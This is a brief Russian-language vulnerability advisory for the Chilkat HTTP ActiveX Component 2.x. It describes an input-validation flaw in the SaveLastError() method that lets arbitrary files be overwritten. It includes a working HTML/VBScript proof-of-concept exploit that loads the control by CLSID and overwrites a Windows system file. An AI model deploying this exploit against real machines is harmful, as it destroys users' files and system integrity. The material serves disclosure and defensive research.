Программа: Chilkat HTTP ActiveX Component 2.x

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в ChilkatHttp.ChilkatHttp.1 и ChilkatHttp.ChilkatHttpRequest.1 ActiveX компонентах (ChilkatHttp.dll) в методе "SaveLastError()". Атакующий может перезаписать произвольные файлы на целевой системе.

Эксплоит:

<object classid='clsid:B973393F-27C7-4781-877D-8626AAEDF119' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.SaveLastError "c:\windows\system_.ini"
MsgBox "Exploit completed!"
End Sub
</script>



Оставить мнение